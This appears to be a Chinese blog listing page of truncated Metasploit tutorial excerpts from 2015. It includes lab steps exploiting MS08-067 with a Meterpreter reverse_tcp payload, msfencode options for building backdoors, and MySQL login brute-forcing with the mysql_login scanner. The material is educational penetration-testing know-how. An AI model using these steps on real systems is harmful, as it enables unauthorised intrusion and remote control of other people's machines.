metasploit信息收集模块刚开始的我们需要开启数据库但是呢,有的时候出现,数据库没有链接这个时候呢,我们只要输入一条命令就可以了输入db_rebuild_cache命令即可whois查询查看网站的一些信息,,注册人,之策人的邮箱,注册地点http://searchdbs.netcraft.co...
分类:
Web程序 时间:
2015-11-19 20:35:50
阅读次数:
228
全称:metasploit Framework分为metasploit Framework 有商业版本也有免费版本的是由ruby语言写的,是开源的windows和linux都有一般我们用的都是控制台模式攻击分类:exploit溢出auxiliary模块encoders编码payload攻击载荷溢出:...
分类:
Web程序 时间:
2015-11-19 20:32:06
阅读次数:
151
学习最近确实是走了不少弯路,学习Metasploit魔鬼训练营等,东学学西学学什么也没有学到。还是回归简单最好,回头想了一下,自己那里有一张Windows下黑阔发展流程图,怎么把这给忘了。于是便照着这张图开始学习。 有点大= =。 开始正文。 0x01:基础操作。 一、创建数据库与表...
分类:
数据库 时间:
2015-10-14 23:32:01
阅读次数:
234
“如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头。” –Abraha...
分类:
Web程序 时间:
2015-10-02 21:11:47
阅读次数:
173
在上一节的内容中,大家了解了Metasploit的结构。这一节我们主要介绍的是msfconsole的理论。msfconsole理论在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习,但是msfconsole真...
分类:
Web程序 时间:
2015-10-02 21:08:21
阅读次数:
435
拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器msfconsole进入msf控制台输入searchms0-067找到相应模块useexploit/windows/smb/ms08_067_netapi使用相应模块setPAYLOADwindows/meterpreter/reverse_tcp设置反弹连接showoptions查看设置选项setRHOST1..
分类:
Web程序 时间:
2015-09-19 06:23:28
阅读次数:
254
说了msfpayload,自然就到了msfencode,不管别的,很多生成后门的命令就要用这两条。。。root@bt:/opt/metasploit/msf3#msfencode-h
Usage:/opt/metasploit/msf3/msfencode<options>
OPTIONS:
-a<opt>Thearchitecturetoencodeas//指定CPU的类型
-b<opt>Thel..
分类:
Web程序 时间:
2015-08-28 13:38:27
阅读次数:
210
下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_loginmsf auxiliary(...
分类:
数据库 时间:
2015-08-11 17:41:05
阅读次数:
426
黑客攻击的方式思路是先搜集信息,定位漏洞,然后针对不同的漏洞采用不同的方式来黑掉你。下面用metasploit模拟一次跨站脚本攻击(黑掉自己的手机)。1.搜集信息msf > search androidMatching Modules================ Name ...
分类:
移动开发 时间:
2015-08-11 00:03:42
阅读次数:
306
安装环境操作时间: 2015/6/8操作系统: OSX Yosemite 10.10.3Metasploit版本: v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]Ruby版本: 2.1.6p336 (2015-04-13 revision 50298)整体安装...
分类:
Web程序 时间:
2015-06-09 23:35:06
阅读次数:
263